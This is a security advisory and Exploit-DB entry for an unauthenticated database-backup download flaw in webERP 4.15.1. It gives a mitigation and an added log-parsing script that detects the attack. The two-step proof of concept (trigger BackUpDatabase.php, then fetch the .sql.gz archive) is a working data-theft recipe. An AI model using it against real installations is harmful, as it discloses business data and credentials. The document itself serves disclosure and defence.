Vendor: webERP
By: Besim ALTINOK
CVSS: 7.5 (HIGH)
Title: Unauthenticated Backup File Access
CWE: 532
Product Name: webERP
Affected Version From: 4.15.1
Affected Version To: 4.15.1
Patch Exists: NO
Related CWE: N/A
CPE: a:weberp:web_erp
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Xampp
Year: 2020

webERP 4.15.1 – Unauthenticated Backup File Access

webERP is a complete web-based accounting and business management system that requires only a web browser and a PDF reader to use. It has a wide range of features suitable for many businesses, particularly distributed businesses in wholesale, distribution, and manufacturing. This vulnerability allows an attacker to retrieve a database backup of the webERP application without authentication: the backup archive is written into a directory under the web root, so anyone who knows its path can download it directly, for example http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz

Mitigation:

Ensure that backup files are not accessible to unauthorized users: store them outside the web root, or deny web access to the companies/ directory and to *.sql.gz files.

Exploit-DB raw data:

# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: http://www.weberp.org
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------
About Software:

webERP is a complete web-based accounting and business management system
that requires only a web-browser and pdf reader to use. It has a wide range
of features suitable for many businesses particularly distributed
businesses in wholesale, distribution, and manufacturing.

-------------------------------------------------------
PoC: Unauthenticated Backup File Access
---------------------------------------------

1- Requesting this file generates a new backup file:
http://localhost/webERP/BackUpDatabase.php
2- Anyone can then download the backup file from:
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz
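The two PoC steps above leave a recognisable trace in the web server access log: a request to BackUpDatabase.php followed by a download of a Backup_*.sql.gz archive under companies/. The following detection script is an added example, not part of the original advisory or of webERP; it parses Apache combined-format log lines (the sample lines are constructed, the client IPs are documentation addresses) and reports, per source IP, backup generations and successful (2xx) versus failed archive downloads, so a defender can confirm whether an exposed backup was actually retrieved.

```python
import re
from collections import defaultdict

# Constructed sample log lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [01/May/2020:16:55:40 +0000] "GET /webERP/BackUpDatabase.php HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.5 - - [01/May/2020:16:55:52 +0000] "GET /webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz HTTP/1.1" 200 184320 "-" "curl/7.68.0"
198.51.100.7 - - [01/May/2020:17:02:11 +0000] "GET /webERP/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [01/May/2020:17:05:03 +0000] "GET /webERP/companies/weberp/Backup_2020-04-30-01-00-00.sql.gz HTTP/1.1" 404 210 "-" "curl/7.68.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, path, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
# Backup archive path as produced by webERP: companies/<company>/Backup_YYYY-MM-DD-HH-MM-SS.sql.gz
BACKUP_RE = re.compile(r'/companies/[^/]+/Backup_\d{4}-\d{2}-\d{2}-\d{2}-\d{2}-\d{2}\.sql\.gz$')
GENERATOR_RE = re.compile(r'/BackUpDatabase\.php$')


def find_backup_access(log_text):
    """Return one dict per request that hit the backup generator or a backup archive."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m.group('path').split('?', 1)[0]  # drop any query string before matching
        if BACKUP_RE.search(path):
            kind = 'backup_download'
        elif GENERATOR_RE.search(path):
            kind = 'backup_generate'
        else:
            continue
        hits.append({'ip': m.group('ip'), 'ts': m.group('ts'), 'path': path,
                     'status': int(m.group('status')), 'kind': kind})
    return hits


def summarize(hits):
    """Per source IP: generator calls, 2xx archive downloads (confirmed exposure), failed downloads."""
    summary = defaultdict(lambda: {'generate': 0, 'download_ok': 0, 'download_fail': 0})
    for h in hits:
        s = summary[h['ip']]
        if h['kind'] == 'backup_generate':
            s['generate'] += 1
        elif 200 <= h['status'] < 300:
            s['download_ok'] += 1
        else:
            s['download_fail'] += 1
    return dict(summary)


if __name__ == '__main__':
    for ip, counts in summarize(find_backup_access(SAMPLE_LOG)).items():
        print(ip, counts)
```

A non-zero download_ok count for a source that never established a webERP session is the signal to treat the database contents as disclosed and rotate the credentials they contain.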